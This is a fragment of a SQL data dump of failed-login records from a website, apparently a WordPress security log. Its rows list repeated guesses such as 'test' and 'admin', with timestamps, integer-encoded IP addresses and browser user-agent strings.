(102515, 1498922132.053663, 1, 'loginFailInvalidUsername', 'test', 0, 769478934, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102516, 1498922151.643413, 1, 'loginFailInvalidUsername', 'test', 0, 1493206923, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102517, 1498922152.663412, 1, 'loginFailInvalidUsername', 'test', 0, 1493206923, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102518, 1498923056.287628, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3547740144, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102519, 1498925077.962471, 1, 'loginFailInvalidUsername', 'test', 0, 1124633035, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102520, 1498925079.155366, 1, 'loginFailInvalidUsername', 'test', 0, 1124633035, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102521, 1498926606.497674, 1, 'loginFailInvalidUsername', '{login}', 0, 1382287881, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102522, 1498927375.365512, 1, 'loginFailInvalidUsername', 'test', 0, 778276980, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102523, 1498927511.259828, 1, 'loginFailInvalidUsername', 'test', 0, 3154114328, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102524, 1498927512.649825, 1, 'loginFailInvalidUsername', 'test', 0, 3154114328, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102525, 1498928680.359253, 1, 'loginFailValidUsername', 'admin', 1, 1467287951, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102526, 1498928680.396542, 1, 'loginFailValidUsername', 'julie', 2, 2249451108, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102527, 1498929523.938265, 1, 'loginFailInvalidUsername', 'test', 0, 3230918435, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102528, 1498929525.378862, 1, 'loginFailInvalidUsername', 'test', 0, 3230918435, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102529, 1498930108.327923, 1, 'loginFailInvalidUsername', 'test', 0, 1743552465, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102530, 1498930113.633189, 1, 'loginFailInvalidUsername', 'test', 0, 1743552465, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102531, 1498930156.775911, 1, 'loginFailValidUsername', 'admin', 1, 1835212154, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102532, 1498931897.660018, 1, 'loginFailInvalidUsername', '{login}', 0, 1534992972, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102533, 1498932912.166905, 1, 'loginFailInvalidUsername', 'test', 0, 1389595016, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102534, 1498932913.241273, 1, 'loginFailInvalidUsername', 'test', 0, 1389595016, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102535, 1498933603.373359, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1833976244, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102536, 1498938606.359598, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1406385447, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102537, 1498940280.143123, 1, 'loginFailValidUsername', 'admin', 1, 1308955926, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102538, 1498941320.703377, 1, 'loginFailInvalidUsername', 'test', 0, 3211865851, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102539, 1498942616.611534, 1, 'loginFailInvalidUsername', 'test', 0, 3321174249, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102540, 1498942617.958379, 1, 'loginFailInvalidUsername', 'test', 0, 3321174249, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102541, 1498943554.109320, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3582797194, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102542, 1498943682.976373, 1, 'loginFailInvalidUsername', 'test', 0, 3373612601, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102543, 1498943684.378969, 1, 'loginFailInvalidUsername', 'test', 0, 3373612601, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102544, 1498944450.691229, 1, 'loginFailInvalidUsername', 'test', 0, 3154286681, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102545, 1498944451.839174, 1, 'loginFailInvalidUsername', 'test', 0, 3154286681, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102546, 1498945172.472702, 1, 'loginFailValidUsername', 'admin', 1, 1828828346, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102547, 1498945619.659779, 1, 'loginFailInvalidUsername', 'test', 0, 523176129, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102548, 1498945620.743357, 1, 'loginFailInvalidUsername', 'test', 0, 523176129, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102549, 1498946990.359328, 1, 'loginFailInvalidUsername', 'test', 0, 1593762795, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102550, 1498946991.841186, 1, 'loginFailInvalidUsername', 'test', 0, 1593762795, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102551, 1498948138.808332, 1, 'loginFailInvalidUsername', 'test', 0, 48140760, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102552, 1498948140.218791, 1, 'loginFailInvalidUsername', 'test', 0, 48140760, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102553, 1498948326.595492, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1541065241, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102554, 1498949487.580029, 1, 'loginFailInvalidUsername', 'test', 0, 1443044267, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102555, 1498949618.290491, 1, 'loginFailInvalidUsername', 'test', 0, 3168301617, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102556, 1498950230.362576, 1, 'loginFailInvalidUsername', 'test', 0, 1626131942, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102557, 1498950231.462550, 1, 'loginFailInvalidUsername', 'test', 0, 1626131942, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102558, 1498951504.411891, 1, 'loginFailInvalidUsername', '{login}', 0, 93749945, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102559, 1498952750.737556, 1, 'loginFailInvalidUsername', 'test', 0, 1544811101, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102560, 1498952751.842055, 1, 'loginFailInvalidUsername', 'test', 0, 1544811101, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102561, 1498953089.646448, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1053943371, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102562, 1498953609.714865, 1, 'loginFailInvalidUsername', 'test', 0, 2588452463, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102563, 1498953611.741485, 1, 'loginFailInvalidUsername', 'test', 0, 2588452463, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102564, 1498954389.129196, 1, 'loginFailInvalidUsername', 'test', 0, 2152704098, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102565, 1498954390.313101, 1, 'loginFailInvalidUsername', 'test', 0, 2152704098, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102566, 1498954552.023421, 1, 'loginFailInvalidUsername', 'test', 0, 1438777814, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102567, 1498954552.984463, 1, 'loginFailInvalidUsername', 'test', 0, 1438777814, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102568, 1498954703.130364, 1, 'loginFailValidUsername', 'admin', 1, 3105429741, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102569, 1498957270.610423, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/533.94.41 (KHTML, like Gecko) Version/5.3.8 Safari/531.86'),
(102570, 1498957291.126097, 1, 'loginFailInvalidUsername', 'test', 0, 3037638382, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102571, 1498957292.626038, 1, 'loginFailInvalidUsername', 'test', 0, 3037638382, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102572, 1498958025.817035, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1583005739, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102573, 1498958244.317248, 1, 'loginFailInvalidUsername', 'test', 0, 1550770426, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102574, 1498958245.237135, 1, 'loginFailInvalidUsername', 'test', 0, 1550770426, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102575, 1498959524.667179, 1, 'loginFailInvalidUsername', 'test', 0, 3731698192, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102576, 1498959645.514565, 1, 'loginFailValidUsername', 'admin', 1, 3107039351, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102577, 1498961262.492031, 1, 'loginFailInvalidUsername', '{login}', 0, 762716335, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102578, 1498962762.245506, 1, 'loginFailInvalidUsername', 'test', 0, 1549936997, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102579, 1498962899.186223, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1978717628, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102580, 1498964561.257545, 1, 'loginFailValidUsername', 'admin', 1, 1499487333, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102581, 1498964563.120995, 1, 'loginFailValidUsername', 'admin', 1, 1499487333, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102582, 1498964927.157665, 1, 'loginFailInvalidUsername', 'test', 0, 700293587, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102583, 1498964930.559413, 1, 'loginFailInvalidUsername', 'test', 0, 700293587, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102584, 1498966204.732353, 1, 'loginFailInvalidUsername', '{login}', 0, 3151105913, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102585, 1498967392.080024, 1, 'loginFailInvalidUsername', 'test', 0, 1777049476, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102586, 1498969206.847070, 1, 'loginFailValidUsername', 'admin', 1, 1839458818, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36'),
(102587, 1498969481.805556, 1, 'loginFailValidUsername', 'admin', 1, 1521617214, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102588, 1498970487.693511, 1, 'loginFailInvalidUsername', 'test', 0, 657922338, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102589, 1498971962.636790, 1, 'loginFailInvalidUsername', 'test', 0, 1228460843, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102590, 1498971963.871013, 1, 'loginFailInvalidUsername', 'test', 0, 1228460843, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102591, 1498972881.746911, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3566133939, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102592, 1498974562.568490, 1, 'loginFailValidUsername', 'admin', 1, 3254658408, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102593, 1498976234.698118, 1, 'loginFailInvalidUsername', '{login}', 0, 1835212158, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102594, 1498977863.725933, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3002985501, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102595, 1498977974.462299, 1, 'loginFailInvalidUsername', 'test', 0, 1235922150, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102596, 1498980232.685195, 1, 'loginFailInvalidUsername', 'test', 0, 2681021276, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102597, 1498980233.766216, 1, 'loginFailInvalidUsername', 'test', 0, 2681021276, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102598, 1498981149.327055, 1, 'loginFailInvalidUsername', '{login}', 0, 1833987480, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102599, 1498982817.425918, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1307655556, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102600, 1498984426.389075, 1, 'loginFailValidUsername', 'admin', 1, 1835212082, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102601, 1498985496.006629, 1, 'loginFailInvalidUsername', 'test', 0, 3556288374, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102602, 1498985497.471550, 1, 'loginFailInvalidUsername', 'test', 0, 3556288374, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102603, 1498986074.666852, 1, 'loginFailInvalidUsername', '{login}', 0, 1343619483, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102604, 1498987787.098474, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1833985512, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102605, 1498988910.996378, 1, 'loginFailInvalidUsername', 'test', 0, 1743572606, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102606, 1498988912.328648, 1, 'loginFailInvalidUsername', 'test', 0, 1743572606, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102607, 1498989505.867912, 1, 'loginFailValidUsername', 'admin', 1, 3105030883, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102608, 1498990988.139068, 1, 'loginFailInvalidUsername', 'test', 0, 2875283979, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102609, 1498991149.681785, 1, 'loginFailInvalidUsername', '{login}', 0, 3582503888, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102610, 1498993192.651018, 1, 'loginFailInvalidUsername', 'test', 0, 3398331244, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102611, 1498993194.029716, 1, 'loginFailInvalidUsername', 'test', 0, 3398331244, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102612, 1498994507.332061, 1, 'loginFailValidUsername', 'admin', 1, 1729922310, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102613, 1498997068.617812, 1, 'loginFailInvalidUsername', 'test', 0, 2956551613, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102614, 1498997069.766033, 1, 'loginFailInvalidUsername', 'test', 0, 2956551613, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102615, 1498998820.713356, 1, 'loginFailInvalidUsername', 'test', 0, 1360878850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102616, 1498998821.739530, 1, 'loginFailInvalidUsername', 'test', 0, 1360878850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102617, 1498999445.195788, 1, 'loginFailInvalidUsername', 'test', 0, 3389113218, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102618, 1498999446.589112, 1, 'loginFailInvalidUsername', 'test', 0, 3389113218, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102619, 1498999615.606717, 1, 'loginFailValidUsername', 'admin', 1, 1478285310, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102620, 1499000074.401570, 1, 'loginFailInvalidUsername', 'test', 0, 778257480, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102621, 1499000075.627660, 1, 'loginFailInvalidUsername', 'test', 0, 778257480, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102622, 1499001354.910504, 1, 'loginFailInvalidUsername', '{login}', 0, 3107039254, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102623, 1499001596.636167, 1, 'loginFailInvalidUsername', 'test', 0, 1744484549, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102624, 1499001598.359578, 1, 'loginFailInvalidUsername', 'test', 0, 1744484549, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102625, 1499003074.270374, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 48297797, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102626, 1499003159.530836, 1, 'loginFailInvalidUsername', 'test', 0, 1728419331, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102627, 1499003161.447238, 1, 'loginFailInvalidUsername', 'test', 0, 1728419331, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102628, 1499005847.737354, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.99.42 (KHTML, like Gecko) Chrome/57.4.0187.5459 Safari/534.50 OPR/40.6.1800.6172'),
(102629, 1499006297.096235, 1, 'loginFailInvalidUsername', 'test', 0, 1570986826, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102630, 1499006298.109246, 1, 'loginFailInvalidUsername', 'test', 0, 1570986826, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102631, 1499006476.985029, 1, 'loginFailInvalidUsername', 'test', 0, 1391229745, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102632, 1499006526.626876, 1, 'loginFailInvalidUsername', '{login}', 0, 1541065254, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102633, 1499007067.789803, 1, 'loginFailInvalidUsername', 'test', 0, 3280869997, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102634, 1499007068.871938, 1, 'loginFailInvalidUsername', 'test', 0, 3280869997, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102635, 1499007559.271185, 1, 'loginFailValidUsername', 'admin', 1, 1053976948, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36'),
(102636, 1499008225.750504, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1533920903, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102637, 1499009683.056377, 1, 'loginFailInvalidUsername', 'test', 0, 1337145077, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102638, 1499009684.078781, 1, 'loginFailInvalidUsername', 'test', 0, 1337145077, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102639, 1499009815.881044, 1, 'loginFailInvalidUsername', 'test', 0, 2979932285, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102640, 1499009817.259300, 1, 'loginFailInvalidUsername', 'test', 0, 2979932285, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102641, 1499009861.331066, 1, 'loginFailValidUsername', 'admin', 1, 1046956164, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102642, 1499010934.836393, 1, 'loginFailInvalidUsername', 'test', 0, 3317472021, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102643, 1499010937.959518, 1, 'loginFailInvalidUsername', 'test', 0, 3317472021, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102644, 1499011298.149185, 1, 'loginFailInvalidUsername', 'test', 0, 3106308979, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102645, 1499011299.076247, 1, 'loginFailInvalidUsername', 'test', 0, 3106308979, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102646, 1499011517.593721, 1, 'loginFailInvalidUsername', '{login}', 0, 3632859043, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102647, 1499011994.587054, 1, 'loginFailInvalidUsername', 'test', 0, 1451120174, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102648, 1499011995.546894, 1, 'loginFailInvalidUsername', 'test', 0, 1451120174, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102649, 1499013180.780896, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1046696106, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102650, 1499014842.564839, 1, 'loginFailValidUsername', 'admin', 1, 1521628529, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102651, 1499015275.147941, 1, 'loginFailInvalidUsername', 'test', 0, 3171206256, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102652, 1499015276.520983, 1, 'loginFailInvalidUsername', 'test', 0, 3171206256, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102653, 1499016504.377823, 1, 'loginFailInvalidUsername', '{login}', 0, 1521711259, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102654, 1499017018.362353, 1, 'loginFailInvalidUsername', 'test', 0, 3319952174, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102655, 1499018143.406438, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1834071249, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102656, 1499018659.081093, 1, 'loginFailInvalidUsername', 'test', 0, 762636584, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102657, 1499018660.953592, 1, 'loginFailInvalidUsername', 'test', 0, 762636584, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102658, 1499022034.170033, 1, 'loginFailInvalidUsername', 'test', 0, 1891930274, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102659, 1499022035.457034, 1, 'loginFailInvalidUsername', 'test', 0, 1891930274, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102660, 1499023000.790644, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1307655567, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102661, 1499024676.207927, 1, 'loginFailValidUsername', 'admin', 1, 1521617220, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102662, 1499025056.187251, 1, 'loginFailInvalidUsername', 'test', 0, 632731739, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102663, 1499025057.224043, 1, 'loginFailInvalidUsername', 'test', 0, 632731739, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102664, 1499031006.582238, 1, 'loginFailInvalidUsername', 'test', 0, 1363303233, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102665, 1499031161.165564, 1, 'loginFailInvalidUsername', '{login}', 0, 774364586, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102666, 1499032738.360061, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1582958461, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102667, 1499037587.588290, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 774362247, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
